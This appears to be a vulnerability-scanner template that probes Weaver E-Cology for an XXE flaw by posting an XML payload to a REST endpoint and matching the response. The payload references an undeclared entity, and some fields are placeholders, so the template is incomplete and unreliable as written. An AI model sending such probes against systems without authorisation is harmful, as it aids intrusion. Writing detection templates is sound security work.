id: e-cology-xxe
info:
  name: 泛微E-Cology XXE漏洞
  author: weehhd
  severity: medium
  description: https://blog.csdn.net/qq_41904294/article/details/131878446
  reference:
    - https://
  tags: tags
http:
  - raw:
      - |-
        POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Go-http-client/1.1
        Content-Length: 34
        Content-Type: application/xml
        Accept-Encoding: gzip


        <M><syscode>&send;</syscode></M>
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - Check
      - type: word
        part: header
        words:
          - HTTP/1.1 200 OK
